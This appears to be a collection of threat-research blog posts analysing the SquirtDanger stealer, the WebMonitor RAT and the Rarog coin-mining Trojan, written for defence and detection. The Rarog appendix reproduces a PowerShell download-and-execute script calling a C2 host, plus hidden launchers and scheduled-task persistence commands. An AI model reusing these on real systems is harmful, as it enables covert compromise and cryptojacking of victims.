This dropped file is given both SYSTEM and HIDDEN attributes to prevent victims from discovering it. A new scheduled task is created with a name of ‘CheckUpdate’ to run this file. This scheduled task checks every minute after it is initially setup.

SquirtDanger proceeds to communicate with the remote C2 server using raw TCP sockets. Data sent between the client and server is serialized, however, it is not obfuscated. When the malware initially communicates with the remote server, it will attempt to obtain a list of additional modules to install. An example of this communication may be seen below:

SquirtDanger_8

Figure 6 Example communication between malware client and C2 server

After the list of modules and their associated URLs are collected, SquirtDanger will download these modules via HTTP communication.

SquirtDanger comes with a wealth of functionality, including the following:

  • Take screenshots
  • Delete malware
  • Send file
  • Clear browser cookies
  • List processes
  • Kill process
  • List drives
  • Get directory information
  • Download file
  • Upload file
  • Delete file
  • Steal wallets
  • Steal browser passwords
  • Swap identified wallets in the victim’s clipboard
  • Execute file

In the case of stealing passwords from browsers, a number of browsers are supported, including the following:

  • Chrome
  • Firefox
  • Yandex Browser
  • Kometa
  • Amigo
  • Torch
  • Opera

SquirtDanger_9

Figure 7 Malware attempting to collect passwords from various popular browsers

SquirtDanger also has the ability to seek out wallets for various cryptocurrencies, including the following:

  • Litecoin
  • Bitcoin
  • Bytecoin
  • Dash
  • Electrum
  • Ethereum
  • Monero

SquirtDanger_10

Figure 8 Malware attempting to identify various cryptocurrency wallets on the victim machine

In addition to stealing wallets, the malware contains the ability to swap a victim’s clipboard data in the event a specific regular expression is encountered. The following regular expressions were present within the malware:

Type Regular Expression
QIWI (^+d{1,2})?(((d{3}))|(-?d{3}-)|(d{3}))((d{3}-d{4})|(d{3}-dd-dd)|(d{7})|(d{3}-d-d{3}))
BTC ^([13][a-km-zA-HJ-NP-Z1-9]{25,34})$
ETH ^(0x[0-9a-fA-F]{40})$
LTC ^(L[a-zA-Z0-9]{26,33})$
XRP ^(r[rpshnaf39wBUDNEGHJKLM4PQRST7VWXYZ2bcdeCg65jkm8oFqi1tuvAxyz]{27,35})$
DOGE ^(t[0-9a-zA-Z]{34})$
ZEC ^(D{1}[5-9A-HJ-NP-U]{1}[1-9A-HJ-NP-Za-km-z]{32})$
XMR ^(4[0-9AB][1-9A-Za-z]{93,104})$

In the event one of these digital currency addresses are encountered, the malware is configured to swap the value with one that is pre-determined. A number of digital currency addresses were able to be retrieved from our sample set, which have been included in the Appendix of this blog post. This feature is not a new one, as we have previously reported on it when analyzing the ComboJack malware family.

SquirtDanger Samples

For a full list of SquirtDanger hashes, as well as their first seen timestamps, please refer to the following link.

C2 Servers

For a full list of C2 servers, as well as their first seen timestamps, please refer to the following link.

Distribution Servers

For a full list of distribution servers, as well as their first seen timestamps, please refer to the following link.

The post SquirtDanger: The Swiss Army Knife Malware from Veteran Malware Author TheBottle appeared first on Palo Alto Networks Blog.

Go to Source
Author: Josh Grunzweig

Say “Cheese”: WebMonitor RAT Comes with C2-as-a-Service (C2aaS)

While looking at commodity RATs currently offered on underground forums, we came across “WebMonitor”, on the market since mid-2017. We noticed that while detection was high for most anti-virus vendors, all tagged it with only generic detection. At this point we realized that although this malware had been around for almost a year, we were looking at a hitherto-undocumented commodity RAT.

For Sale

Commodity RATs are typically peddled on underground forums and come and go with new offerings springing up to replace those taken down by law enforcement actions.

Say Cheese_1

Figure 1 – WebMonitor RAT Forum sales thread

We first observed apparent tests of this RAT in late February 2017. In May 2017, “Revcode” advertises his RAT “WebMonitor” at hackforums[.]net (Figure 1) for €14.99 – €29.99 (Figure 2):

“[#1 Web RAT, CONTROL FROM WEB BROWSER, No PORTFORWARD, KEYLOGGER, + VPN]”.

Say Cheese_2

Figure 2 – Editions of WebMonitor RAT sold at three different pricepoints.

In addition to forum sales thread, Revcode’s main sales and support site is at revcode[.] eu (Figure 3).

Say Cheese_3

Figure 3 – Screenshot of revcode[.]eu advertising WebMonitor

Features

On the server-side, WebMonitor offers an included VPN and C2 service (discussed in detail later in this report), with a web-based interface (Figure 4).

Say Cheese_4

Figure 4 – Web-based C2 interface

WebMonitor offers two interface options: the original “Lite” version, and a slicker interface in the “Enterprise” version.

A list of features is provided at the site, some of which stretch the guise of a legitimate administration tool:

  • Applications
    • App crash log
    • Injected DLLs list
    • Installed codes list
    • Loaded DLLs list
    • Overview
  • Bluetooth
    • Bluetooth log view
    • Bluetooth view
  • Browser
    • Addons list
    • History
    • Image cache
  • Credentials
    • Browser
      • Passwords
    • Mail
      • All clients
    • Messenger live
      • All clients
    • Network
      • Net pass
      • Wifi key view
    • System
      • Keys
    • Filesystem
      • Disk smart view
      • File browser
      • Recent files list
    • Forensics
      • Harddrive operations
      • Physical RAM dump
    • Keyboard
      • Harddrive operations
      • Physical RAM dump
    • Messengers
      • Harddrive operations
      • Physical RAM dump
    • Monitor
      • Harddrive operations
      • Physical RAM dump
    • Networking
      • Net route view
      • TCP analyze
      • URL protocol view
      • User profiles view
      • WiFi info
      • WiFi channel monitor
      • WiFi history
      • Wireless networks
      • Wireless watcher
    • Runtime
      • Blue screen log
      • Turned on times
    • System
      • Battery info
      • Connections
      • Device manager
      • Drivers
      • Firmtables
      • Hardware manager
      • Information
      • Internal activity
      • MUI cache
      • Process manager
      • Remote registry
      • Remote shell
      • Security software list
      • Services
      • Startup view
      • Win logon activity
      • Windows list
      • Windows update list
    • Webcam
      • Snapshot
      • Stream Webcam

A recent development, in January Revcode partner “Softpatch” offers an Android RAT client, posting the source code at Github.

WebMonitor Client

The WebMonitor client (ie: the RAT) is written in Visual Basic 6 (VB6) and packed with UPX.

It installs to users%USERNAME%AppDataRoamingREVCODE-***.EXE,

where **** is a random 4-digit hex value.

For persistence it creates a registry key under

x86: HKCUSoftwareMicrosoftWindowsCurrentVersionRun 

x64: HKCUUSoftwareWow6432NodeMicrosoftWindowsCurrentVersionRun) (Figure 5), similarly appending using the same 4-digit value.

Say Cheese_5

Figure 5 – Persistence registry key

Along with the C2-as-a-Service, the client builder is designed for ease of use, with a focus on simplicity. Along with deciding whether a pop-up is displayed – or not – the customer can decide whether the client should run at startup, and if the process should restart if terminated (Figure 6).

Say Cheese_6

Figure 6 – Client Builder Interface

Revcode partner (or alternative forum account) attempts to claim legitimacy “We have to follow the laws and therefore have to display installation dialogs. However, we can’t help if people bypass that by cracking or patching the executable.” But then contradicts himself in fact, with the builder option to NOT create an installation pop-up, and “The reason why me made it possible in a way to bypass the dialog is when customers want to update their clients. We don’t find it necessary to reproduce the installation dialogs.”.

C2aaS

As previously seen in Quaverse RAT / QRAT, WebMonitor offers Command-and-Control (C2)-as-a-Service (C2aas). Customers don’t have to (in fact, can’t) run their own C2 system, it’s provided for them. WebMonitor C2s to virtual-hostnames, apparently unique to each customer, at one of two root C2 domains. Although C2 communication is over HTTPS, an obvious downside to such a C2 domain architecture is that the C2 traffic is easily detected and blocked based upon the domains.

WebMonitor customers access their C2 web interface via user-specific virtual hostnames at the host C2s (Figure 7).

Say Cheese_7

Figure 7 – C2 Virtual Hosts

The original C2 domain was the same as the sales website, revcode[.]eu. In late July 2017, a second root-C2 was brought online, wm01[.]to (“WebMonitor”).

DNS & Coin Mining

Starting in samples first observed late-November 2017, in addition to DNS lookups for the C2 as described above, the RAT clients also performed multiple lookups for non-existent domains (Figure 8).

Say Cheese_8

Figure 8 – NXD and Monero Mining Pool DNS lookups

These take the form .<8_char_hex_value>.to. No domains in any observed samples using this technique actually exist, and as such the DNS “NXD” (non-existent domain) response has no obvious C2 function.

It is possible that this is may be a yet-to-be-implemented Domain Generation Algorithm (DGA) implementation, otherwise possibly a clumsy and ineffectual effort to attempt to camouflage the genuine C2 DNS lookup among invalid ones.

One of the very first samples observed using this new technique also contacted a Monero Mining Pool server pool1.minexmr[.]com, as seen in Figure 8 above. This may have been the author testing rather than a feature released to his customers, as we only observed this once in the wild. Monero mining is hardly representative of a feature of a “legitimate remote administration utility”.

RAT Customers and Targets

Revcode[.]eu is observed being used less often in recent months, in favor of wm01[.]eu, with some samples contacting both. At time of writing, we understand those to be the only two domains used by WebMonitor’s C2-as-a-Service. Based upon analysis of passive DNS records, we observed just under 100 virtual hosts under the two domains, giving an indication of the relatively small number of customers. To date Palo Alto Networks has collected just over 500 distinct samples of WebMonitor.

Say Cheese_9

Figure 9 – Verticals

The apparently-small number of customers and the “commodity” nature of this malware, with a modest price tag, might suggest an innocuous threat. However, using AutoFocus, we have observed over 2000 WebMonitor infection attempts against Palo Alto Networks customers across multiple verticals (Figure 9), worldwide (Figure 10).

Say Cheese_10

Figure 10 – Global distribution of targets

Author

The domain revcode[.]eu has an in-the-clear, non-anonymized WHOIS (Figure 11). Several current and historical domains are registered with identical information, some back to 2013. Research into the information in the WHOIS found corroborating information, identifying a 25-year-old from the state of Bavaria in southern Germany.

Say Cheese_11

Figure 11 – en-clar revcoce[.]eu WHOIS registration

Interestingly, while WebMonitor has been marketed since May 2017, there has been no other formal analysis and write-up in the year that it has been sold. The tongue-in-cheek, Florida-based blogger “Krabs on Security” offers an analysis, but this hasn’t been picked up by mainstream malware researchers. She opines “a very very legal malware backed by a .eu domain and a very very long Term of Service that was used in CEO Fraud, as seen below. Who would’ve thought such legal software being advertised on the benign forums dubbed “HackForums” would be used for such notorious cybercriminal purposes?”. “Revcode” partner “SoftPatch” seemed slighted and was quick to attack this analysis, pointing out in a forum post (Figure 12) multiple apparent inaccuracies.

Say Cheese_12

Figure 12 – SoftPatch fires back at krabsonsecurity

And Revcode himself, despite the usual attempts at pretense-of-legitimacy seen in Commodity RAT sales, markets features that have no utility for legitimate use: “perfectly compatible with all crypters and protectors”, “Privacy is our priority, so no logs are saved on our servers.”. Revcode partner (or alternative forum account” posts an exhaustive list of credentials that this RAT can recover “Here is a list of what kind of credentials RevCode is capable of recovering”:

Web Browsers:

* Internet Explorer 4.0 – 11.0

* Mozilla Firefox – All versions

* Google Chrome

* Safari

* Opera

 

IM Clients:

* MSN Messenger

* Windows Messenger (In Windows XP)

* Windows Live Messenger (In Windows XP/Vista/7)

* Yahoo Messenger (Versions 5.x and 6.x)

* Google Talk

* ICQ Lite 4.x/5.x/2003

* AOL Instant Messenger v4.6 or below, AIM 6.x, and AIM Pro

* Trillian

* Trillian Astra

* Miranda

* GAIM/Pidgin

* MySpace IM

* PaltalkScene

* Digsby

 

Email Clients:

* Outlook Express

* Microsoft Outlook 2002/2003/2007/2010/2013/2016

* Windows Mail

* Windows Live Mail

* IncrediMail

* Eudora

* Netscape 6.x/7.x (If the password is not encrypted with master password)

* Mozilla Thunderbird (If the password is not encrypted with master password)

* Group Mail Free

* Yahoo! Mail – If the password is saved in Yahoo! Messenger application

* Hotmail/MSN mail – If the password is saved in MSN/Windows/Live Messenger application

* Gmail – If the password is saved by Gmail Notifier application, Google Desktop, or by Google Talk

 

Windows Network Credentials:

* Login passwords of remote computers on your LAN

* Passwords of mail accounts on exchange server (stored by Microsoft Outlook)

* Password of MSN Messenger / Windows Messenger accounts

* Internet Explorer 7.x and 8.x

* The passwords stored by Remote Desktop 6

 

Protected Storage:

* Outlook 97

* Outlook 2000

* Outlook XP, 2003, 2007, 2010, 2013, 2016

 

Product Keys:

* Microsoft Windows XP, Vista, Server, 7, 8, 10

* Microsoft Office 2000, 2003, 2007, 2010

* Microsoft SQL Server 2000, 2005

* Microsoft Exchange Server 2000, 2003

* Visual Studio

* Some of the Adobe and Autodesk products

 

Network Credentials:

* WiFi stored WEP and WPA keys

* Remote Desktop credentials

Summary

The feature set of this RAT would afford an attacker significant access to and control of a victim. Fortunately, owing to the “C2aaS” model employed, detection of and prevention against WebMonitor C2 traffic is trivial. Webmonitor’s addition to the list of currently-marketed commodity RATs demonstrates their continued popularity, enabling successful attacks even in the hands of the unsophisticated attacker.

We predict that WebMonitor won’t last much longer, at least not with this model as the C2s are too easily identified/blocked. Indeed, another aspect of this centralized model, having the hosted service create each client for customers, might put the author’s hands on every one of the malware samples in the eyes of the law.

Coverage

Palo Alto Networks customers are protected from this threat in the following ways:

  1. WildFire accurately identifies WebMonitor RAT samples as malicious.
  2. Traps prevents this threat on endpoints, based upon WildFire prevention.
  3. WebMonitor root C2 domains are flagged as malicious in Threat Prevention.

AutoFocus users can view WebMonitor RAT samples using the “WebMonitorRAT” tag.

IOCs can be found in the appendices of this report.

Appendices – IOCs

Appendix I – C2 domains

revcode[.]eu

wm01[.]to

Appendix II – Sample hashes

Hashes of WebMonitor samples can be found here.

The post Say “Cheese”: WebMonitor RAT Comes with C2-as-a-Service (C2aaS) appeared first on Palo Alto Networks Blog.

Go to Source
Author: Mike Harbison

Smoking Out the Rarog Cryptocurrency Mining Trojan

rarog_1

For the past few months, Unit 42 researchers have investigated a relatively unknown coin mining Trojan that goes by the name ‘Rarog’.

Rarog has been sold on various underground forums since June 2017 and has been used by countless criminals since then. To date, Palo Alto Networks has observed roughly 2,500 unique samples, connecting to 161 different command and control (C2) servers.

Rarog has been seen primarily used to mine the Monero cryptocurrency, however, it has the capability to mine others.  It comes equipped with a number of features, including providing mining statistics to users, configuring various processor loads for the running miner, the ability to infect USB devices, and the ability to load additional DLLs on the victim.

Rarog is in line with the overall trends we’ve seen regarding the rapidly increasing use of cryptocurrency miners. Additionally, Rarog provides an affordable way for new criminals to gain entry into this particular type of malware.

To date, we have confirmed over 166,000 Rarog-related infections worldwide. The majority of these occur in the Philippines, Russia, and Indonesia. While a large number of infections have been recorded by various criminals who have used this mining Trojan, we have seen very little recorded profits: the highest profits we have observed amount to roughly US $120.

The Trojan itself is likely named after a “Raróg”, a fire demon that originates in Slavic mythology and is typically represented as a fiery falcon.

Rarog on the Underground

The Rarog Trojan originated on various Russian-speaking criminal underground sites in June 2017, as shown in the image below:

rarog_2

Figure 1 Posting in Russian underground forum for Rarog malware

The malware sells for 6,000 Rubles, or roughly US $104 at today’s exchange rates. Additionally, a guest administration panel is provided to allow potential buyers the chance to do a “test drive” by interacting with the interface. This interface may be seen below:

rarog_3

Figure 2 Rarog administration panel

Note the two Twitter handles shown in the administration panel above. The first handle, “arsenkooo135”, is the same handle used in various postings for this malware family, including the one shown in Figure 1. We observed the second handle, “foxovsky”, interacting with other security researchers online. We also tied this handle to a GitHub repository with the same handle that hosts various other malware families. Evidence suggests that these two individuals are the ones behind this threat.

rarog_4

Figure 3 Foxovsky handle on Twitter interacting with security researchers regarding the Rarog malware family

rarog_5

Figure 4 Foxovsky’s GitHub profile, hosting various malware families

Additionally, we have seen the “foxovsky” account on GitHub host the Rarog malware family on his or her GitHub account.

Rarog Malware Family

At a very high level, the Rarog Mining Trojan performs the following actions:

rarog_6

Figure 5 Rarog flow of execution

The malware comes equipped with a number of features. It uses multiple mechanisms to maintain persistence on the victim’s machine, including the use of the Run registry key, scheduled tasks, and shortcut links in the startup folder. At its core, Rarog is a coin mining Trojan and gives the attackers the ability to not only download mining software but configure it with any parameters they wish. They’re also able to easily throttle the mining software based on the victim machine’s characteristics.

In addition to coin mining, Rarog also employs a number of botnet techniques. It allows the attackers to perform a number of actions, such as downloading and executing other malware, levying DDoS attacks against others, and updating the Trojan, to name a few. Throughout the malware’s execution, a number of HTTP requests are made to a remote C2 server. An overview of all of these URIs and their description may be found below:

URI Description
/2.0/method/checkConnection To ensure the remote server is responding as expected.
/2.0/method/config Get arguments to supply to miner program.
/2.0/method/delay Retrieve time to sleep before executing miner program.
/2.0/method/error Retrieve information about error message to display to the victim.
/2.0/method/get Get location of miner file based on CPU architecture of victim.
/2.0/method/info Get exe name of miner program.
/2.0/method/setOnline Update statistics for victim on C2 server.
/2.0/method/update Used for updating the Rarog Trojan
/4.0/method/blacklist Retrieve a list of process names to check against. Should any be running in the foreground, Rarog will suspend mining operations.
/4.0/method/check Query remote C2 server to determine if ID exists.
/4.0/method/cores Retrieve percentage of CPU to use on victim machines for mining.
/4.0/method/installSuccess Query the C2 server for botnet instructions.
/4.0/method/modules Retrieve third-party modules to load on victim.
/4.0/method/threads Determine what tasks to run on the victim machine (USB spreading, helper executables, etc.)

For additional information on how the Rarog malware family operations, please refer to the Appendix.

Victim Telemetry

We identified a total of 161 C2 servers communicating with the Rarog malware family. A full list may be found in the Appendix. Looking at the geographic distribution of these C2 servers, we see a high concentration of them located in Russia and Germany.

rarog_7

Figure 6 Distribution of C2 servers hosting Rarog malware

The distribution rate of new Rarog samples has varied in the past nine months, with a large spike occurring between late August to late September of 2017. At its peak, we encountered 187 unique Rarog samples during the week of September 11, 2017.

rarog_8

Figure 7 New Rarog malware samples encountered over time

These samples confirm at least 166,000 victims spread across the globe. While infections occur in most regions of the world, high concentrations occur in the Philippines, Russia, and Indonesia, as seen in the figure below:

rarog_9

Figure 8 Rarog infections across the globe

Rarog is able to provide telemetry those that have purchased it using the third-party MinerGate mining service. A number of MinerGate API keys were able to be retrieved, however, the profits made by these attackers were minimal at best. The most profitable attacker was found to generate roughly 0.58 Monero (XMR), and 54 ByteCoin (BCN). By today’s exchange rates, this amounts to $123.68 total. After factoring in the cost of the malware itself at $104, the attackers in question have generated very little income. In most cases, they’ve lost money.

Ties to Previous Malware Families

In late October 2017, Kaspersky wrote a blog post about a malware family named ‘DiscordiaMiner’. In this blog post, they describe a cryptocurrency miner that shared a number of characteristics with Rarog. Upon further inspection, they mention the author of the program, who is none other than the previously mentioned “foxovsky” user. Indeed, when looking at this user’s GitHub account in Figure 4, we saw the source code to this mining Trojan. The last time the source code to this particular malware was updated was on May 25th, 2017.

Looking at the source code to DiscordiaMiner, we see a large number of similarities with Rarog. So many in fact, that we might reach the conclusion that Rarog is an evolution of Discordia. Kaspersky’s blog post discussed some drama concerning this particular malware family on various underground forums. Accusations were made against the Trojan’s author with substituting customer’s cryptocurrency wallet addresses with his own. This dispute is what ultimately led foxovsky to open-source the DiscordiaMiner program on GitHub. The timeline of when Rarog was first advertised in June 2017, as well as the time DiscordiaMiner was last updated in May 2017, paints, and interesting picture. Based on this information, as well as the heavy code overlap made between the malware families, I suspect that foxovsky rebranded DiscordiaMiner to Rarog and continued development on this newly named malware family. This re-branding allowed him to get away from the negativity that was associated with DiscordiaMiner.

Conclusion

The Rarog malware family represents a continued trend toward the use of cryptocurrency miners and their demand on the criminal underground. While not incredibly sophisticated, Rarog provides an easy entry for many criminals into running a cryptocurrency mining botnet. The malware has remained relatively unknown for the past nine months barring a few exceptions. As the value of various cryptocurrencies continues to remain high, it is likely that we’ll continue to see additional malware families with mining functionality surface.

Palo Alto Networks customers are protected against this threat in the following ways:

  • All samples referenced in this blog post are appropriately marked as malicious in WildFire and Traps
  • All domains used as C2 servers for Rarog are flagged as malicious
  • Tracking of the Rarog malware family may be done through the AutoFocus Rarog tag

Appendix

Technical Malware Analysis

The file with the following properties was used to conduct this analysis:

MD5 15361551cb2f705f80e95cea6a2a7c04
SHA1 a388e464edeb8230adc955ed6a78540ed1433078
SHA256 73222ff531ced249bf31f165777696bb20c42d2148938392335f97f5d937182a
Compile Time 2018-03-17 16:36:18 UTC
PDB String D:Work_RarogReleaseRarog.pdb

When Rarog is initially executed, the malware will look for the existence of the following file:

  • C:ProgramDataMicrosoftCorporationWindowsSystem32Isass.exe

In the event this file is missing on the system, Rarog will enter its installation routine, which is outlined below.

Installation Routine

The installation routine begins by creating the following hidden directory path:

  • C:ProgramDataMicrosoftCorporationWindowsSystem32

It then copies itself to the directory above with a filename of ‘Isass.exe’. This newly copied file is then executed in a new process. After this takes place, the malware makes a HTTP POST request as follows:

POST /2.0/method/checkConnection HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1) Rarog/5.0
Content-Length: 0
Host: api.polotreck[.]xyz

HTTP/1.1 200 OK
Server: nginx/1.13.9
Date: Tue, 20 Mar 2018 16:34:10 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 12
Connection: keep-alive
X-Powered-By: PHP/5.6.30-0+deb8u1

c3VjY2Vzcw==

The response of the above request is simply base64-encoded and decodes to ‘success’. The response is checked, and if the response of ‘success’ is received, the malware proceeds.

The malware makes the following request to determine if the C2 wishes the malware to spawn a fake error message box:

POST /2.0/method/error HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1) Rarog/5.0
Content-Length: 9
Host: api.polotreck[.]xyz

profile=1

HTTP/1.1 200 OK
Server: nginx/1.13.9
Date: Tue, 20 Mar 2018 16:43:58 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 192
Connection: keep-alive
X-Powered-By: PHP/5.6.30-0+deb8u1
Vary: Accept-Encoding

MTsxO1N5c3RlbSBFcnJvcjtUaGUgcHJvZ3JhbSBjYW4ndCBzdGFydCBiZWNhdXNlIE1TVkNQMTEwLmRsbCBpcyBtaXNzaW5nIGZyb20geW91ciBjb21wdXRlci4gVHJ5IHJlaW5zdGFsbGluZyB0aGUgcHJvZ3JhbSB0byBmaXggdGhpcyBwcm9ibGVtLg==

The base64 response above decodes to the following:

“1;1;System Error;The program can’t start because MSVCP110.dll is missing from your computer. Try reinstalling the program to fix this problem.”

The response is split by ‘;’. The first parameter is hardcoded, while the second is used to specify the type of message box to display. The following options are provided:

Parameter MessageBox Option
0 No error message displayed.
1 A stop-sign icon appears in the message box.
2 A question-mark icon appears in the message box.
3 An exclamation-point icon appears in the message box.
4 An icon consisting of a lowercase letter i in a circle appears in the message box.

The third parameter specifies the title of the message box, while the last parameter represents the message. Using the example previously, we are presented with the following message:

rarog_10

Figure 9 Fake error message box displayed by Rarog

Finally, Rarog will execute the following command, which will kill the current malware instance, and deleting it from disk.

cmd.exe /c taskkill /im 73222ff531ced249bf31f165777696bb20c42d2148938392335f97f5d937182a.exe /f & erase C:UsersAdministratoDesktop73222ff531ced249bf31f165777696bb20c42d2148938392335f97f5d937182a.exe & exit

Post-Installation Routine

After the installation routine completes and a new instance of Isass.exe is spawned, this new instance of Rarog will check for the existence of the following file:

  • C:ProgramData{4FCEED6C-B7D9-405B-A844-C3DBF418BF87}driver.dat

If this file does not exist, Rarog will create the necessary hidden directory structure, and make a series of HTTP POST requests. The first request will be to ‘/2.0/method/checkConnection’ to ensure the remote C2 server is alive. The second request is to the following:

POST /4.0/method/installSuccess HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1) Rarog/5.0
Content-Length: 9
Host: api.polotreck[.]xyz

buildID=5.1&hwid={1efdb526-2d21-11e8-a30c-8c8590105ceb}&profile=1&os=Microsoft Windows 7 Ultimate &platform=x86&processor=Intel(R) Core(TM) i7-7700HQ CPU @ 2.80 GHz&videocard=VMware SVGA 3D

HTTP/1.1 200 OK
Server: nginx/1.13.9
Date: Tue, 20 Mar 2018 16:43:58 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 192
Connection: keep-alive
X-Powered-By: PHP/5.6.30-0+deb8u1

250

The response provided by the C2 server is the stored identifier of the victim within the C2 database. This number is stored in the ‘driver.dat’ file.

The following registry key is created to ensure Rarog persists across reboots:

HKCUSoftwareMicrosoftWindowsCurrentVersionRunWindows_Antimalware_Host_Syst - C:ProgramDataMicrosoftCorporationWindowsSystem32Isass.exe

The following hidden directory is created, and the following three files are written to this location:

C:ProgramDataWindowsAppCertificationWindowHelperStorageHostSystemThread.ps1

C:ProgramDataWindowsAppCertificationcert.cmd

C:ProgramDataWindowsAppCertificationchecker.vbs

The contents of WindowHelperStorageHostSystemThread.ps1 is as follows:

$path = 'C:ProgramDataMicrosoftCorporationWindowsSystem32'
$fpath = $path + 'Isass.exe'
$furl = 'http://api.polotreck[.]xyz/2.0/method/update'
 
$isfile = Test-Path $fpath 
if($isfile -eq 'True') {}
else{
New-Item -ItemType directory -Path $path
$WebClient = New-Object System.Net.WebClient
$WebClient.DownloadFile($furl,$fpath)
Start-Process -FilePath $fpath}

The contents of cert.cmd is as follows:

@echo off
powershell -WindowStyle Hidden -ExecutionPolicy Bypass -NoP -file C:ProgramDataWindowsAppCertificationWindowHelperStorageHostSystemThread.ps1

The contents of checker.vbs is as follows:

Set WshShell = CreateObject("WScript.Shell")
WshShell.Run "C:ProgramDataWindowsAppCertificationcert.cmd",0

The following command is executed to create a Scheduled Task to run the checker.vbs script periodically:

schtasks.exe /Create /SC MINUTE /MO 30 /TN "Windows_Antimalware_Host" /TR "C:ProgramDataWindowsAppCertificationchecker.vbs" /F

The following command is executed to create a Scheduled Task to run Isass.exe periodically:

schtasks.exe /Create /SC MINUTE /MO 5 /TN "Windows_Antimalware_Host_Systm" /TR "C:ProgramDataMicrosoftCorporationWindowsSystem32Isass.exe" /F

Additionally, the following command is executed to generate a shortcut link in the victim’s startup folder:

cmd.exe /c echo Set oWS = WScript.CreateObject("WScript.Shell") > CreateShortcut.vbs & echo sLinkFile = "%USERPROFILE%AppDataRoamingMicrosoftWindowsStart MenuProgramsStartupIsass.lnk" >> CreateShortcut.vbs & echo Set oLink = oWS.CreateShortcut(sLinkFile) >> CreateShortcut.vbs & echo oLink.TargetPath = "C:ProgramDataMicrosoftCorporationWindowsSystem32Isass.exe" >> CreateShortcut.vbs & echo oLink.Save >> CreateShortcut.vbs & cscript CreateShortcut.vbs & del CreateShortcut.vbs

These various registry modifications, file modifications, and commands executed provides multiple ways for Rarog to persist on the system both across reboots, as well as in instances where the malware dies or is forcibly closed.

Rarog then makes the following POST request to ensure the ID exists on the remote C2 server:

POST /4.0/method/check HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1) Rarog/5.0
Content-Length: 6
Host: api.polotreck[.]xyz

id=250

HTTP/1.1 200 OK
Server: nginx/1.13.10
Date: Tue, 20 Mar 2018 20:47:52 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 12
Connection: keep-alive
X-Powered-By: PHP/5.6.30-0+deb8u1

c3VjY2Vzcw==

Again, Rarog looks for a response of ‘success’. Rarog continues to make the following POST request:

POST /4.0/method/threads HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1) Rarog/5.0
Content-Length: 0
Host: api.polotreck[.]xyz

HTTP/1.1 200 OK
Server: nginx/1.13.10
Date: Tue, 20 Mar 2018 20:49:46 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 16
Connection: keep-alive
X-Powered-By: PHP/5.6.30-0+deb8u1

MjsxOzE7MTsyOw==

The decoded response by the C2 server is ‘2;1;1;1;2;’. This data is split via ‘;’ and the values are used to indicate whether certain Rarog features are enabled or not. The value of ‘1’ represents ‘On’, while anything else represents ‘Off’.

Position Name Description
0 USB Devices Searches the machine for removable drives. Copies Rarog to the removable drive with the name of ‘autorun.exe’. Also creates an ‘autorun.inf’ file in the same directory, which will execute ‘autorun.exe’ when loaded.
1 Helpers Creates the hidden ‘C:ProgramDataMicrosoftCorporationWindowsHelpers’ directory, and copies Isass.exe to ‘SecurityHeaIthService.exe’, ‘SystemldleProcess.exe’, and ‘winIogon.exe’ in this directory.
2 Mining Status Makes a POST request to ‘/2.0/method/get’ to retrieve a URL for a mining executable. This file is stored in the ‘C:ProgramData{CB28D9D3-6B5D-4AFA-BA37-B4AFAABF70B8}’ directory.
3 Miners Killer Makes a POST request to ‘/4.0/method/modules’. This provides a list of DLLs that are placed in the ‘C:ProgramDataMicrosoftCorporationWindowsModules’ folder. These DLLs are then loaded by Rarog. The DLLs in question are expected to have an export function named ‘Instance’.
4 Task Manager This does not appear to be used by the malware.

When the ‘Mining Status’ option is enabled, and a miner is successfully downloaded from a remote server, Rarog will make the following request to the C2 server:

POST /2.0/method/config HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1) Rarog/5.0
Content-Length: 6
Host: api.polotreck[.]xyz

id=250

HTTP/1.1 200 OK
Server: nginx/1.13.10
Date: Wed, 21 Mar 2018 16:55:38 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 108
Connection: keep-alive
X-Powered-By: PHP/5.6.30-0+deb8u1
Vary: Accept-Encoding

LW8geG1yLnBvb2wubWluZXJnYXRlLmNvbTo0NTU2MCAtdSBtb3JlMnNldEBwcm90b25tYWlsLmNvbSAtcCB4IC1rIC10IHtUSFJFQURTfQ==

The response decodes to the following:

o xmr.pool.minergate[.]com:45560 -u more2set@protonmail[.]com -p x -k -t {THREADS}

These parameters will be supplied to the mining program upon execution. Prior to running the miner, Rarog will check the running processes on the system for the following strings. Should they be encountered, the processes will be killed, and the executable will be deleted from the system.

  • minergate
  • stratum
  • cryptonight
  • monerohash
  • nicehash
  • dwarfpool
  • suprnova
  • nanopool
  • xmrpool

These strings represent common strings associated with mining pools used by individuals when mining various cryptocurrencies.

Rarog will make the following request to determine how much of a percentage of the victim’s CPU to use for mining:

POST /4.0/method/cores HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1) Rarog/5.0
Content-Length: 6
Host: api.polotreck[.]xyz

id=250

HTTP/1.1 200 OK
Server: nginx/1.13.10
Date: Wed, 21 Mar 2018 17:03:18 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
X-Powered-By: PHP/5.6.30-0+deb8u1

NTA=

The response decodes to a value of ‘50’. Rarog continues to make a request to ‘/4.0/method/blacklist’ determine what processes should be blacklisted. The server in question did not have a configured blacklist, but an example of what may be returned is shown below:

dota2.exe;csgo.exe;WorldOfTanks.exe;TslGame.exe;gta5.exe;photoshop.exe;vegas_pro.exe;premier.exe;Prey.exe;Overwatch.exe;MK10.exe;Minecraft.exe;DiabloIII.exe;QuakeChampions.exe;Acrobat.exe;Acrord32.exe

This list represents common resource-intensive applications, such as games, that Rarog will continually monitor for. In the event such a program is running in the foreground, Rarog will suspend mining operations.

